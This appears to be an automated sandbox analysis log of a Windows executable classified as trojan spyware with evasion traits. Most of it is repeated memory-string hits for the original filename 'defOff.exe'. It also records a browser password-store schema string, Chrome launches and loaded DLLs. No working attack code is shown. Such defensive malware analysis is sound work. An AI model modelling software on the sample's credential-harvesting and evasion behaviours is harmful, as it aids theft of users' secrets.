              Source: file.exe, 00000000.00000003.1578349331.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1569890193.0000000005B43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1571148846.0000000005C0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1572788168.0000000005B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1577522164.0000000005C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1573742585.0000000005D1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1568058661.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1581842233.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1582754445.0000000005C9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1573099621.0000000005B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1568655981.0000000005C8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1566384968.00000000057A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1572362509.0000000005B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1580921441.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1573253141.0000000005C30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1575970317.0000000005C50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1574679629.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1575657636.0000000005D35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1582431414.0000000005C98000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1575037479.0000000005C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1574561735.0000000005B42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1569150008.0000000005BEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1568755136.0000000005B44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1579962903.0000000005C7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1574196802.0000000005C3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1574828958.0000000005B46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1571339163.0000000005CDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1578785033.0000000005B43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1571973013.0000000005B43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1568871476.0000000005BE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1569250918.0000000005C97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.1678088995.0000000000F60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1579226347.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1576965844.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1567725943.0000000005B4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1572612719.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1571828816.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1579667380.0000000005C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1573430412.0000000005B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1577692181.0000000005B43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1568252465.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1578212223.0000000005B43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1572934506.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1568389629.0000000005B44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1570528516.0000000005B46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1580684167.0000000005B46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1579816910.0000000005B44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1582058635.0000000005DD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1568954036.0000000005C8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1571665339.0000000005C0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1576410448.0000000005D4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1581448343.0000000005C8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1576837017.0000000005B44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1580523691.0000000005C90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1582264800.0000000005B4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1570766491.0000000005C0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1608807253.0000000000F6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1570269883.0000000005B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1568512671.0000000005BE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1573984262.0000000005B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1567934530.0000000005B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1575476022.0000000005C37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1582618626.0000000005B48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1573583241.0000000005C30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1578639721.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1608316563.000000000575F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1572187006.0000000005C1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.1683009585.0000000005F06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1579518316.0000000005B4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1578496520.0000000005B43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1577103305.0000000005B4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1576700611.0000000005C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1578057832.0000000005D68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1569352666.0000000005B47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1569646104.0000000005B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1576232635.0000000005C42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1580310888.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1570953662.0000000005B48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1567829113.00000000057A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.1682444677.0000000005B43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1581245222.0000000005B4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1574430533.0000000005C3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1569766140.0000000005BFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1608693546.0000000000F74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1572482286.0000000005C13000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1569062762.0000000005B42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1577893709.0000000005C56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1581658770.0000000005B47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1579371691.0000000005C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.1681686094.00000000056AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1576082241.0000000005B48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1578933734.0000000005C64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1576556158.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1569522479.0000000005BFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1570395249.0000000005C0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1568139777.0000000005C7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1566474097.0000000005B50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1575815294.0000000005B45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1570002436.0000000005C00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1566307525.0000000005942000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1580122081.0000000005DBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1579080560.0000000005D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1575145112.0000000005D3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1571514559.0000000005B43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1567606874.00000000057A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1608355370.00000000056D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1574330463.0000000005B4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9973442656765676
              Source: file.exeStatic PE information: Section: fpcukdxy ZLIB complexity 0.9940754610498929
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/64@9/6
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.1362017827.00000000056D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385413160.00000000056CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 39%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1924,i,16693149984039008949,18427732997764737227,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1928,i,15905540884992955177,16070851734019653976,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1924,i,16693149984039008949,18427732997764737227,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1928,i,15905540884992955177,16070851734019653976,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1842688 > 1048576
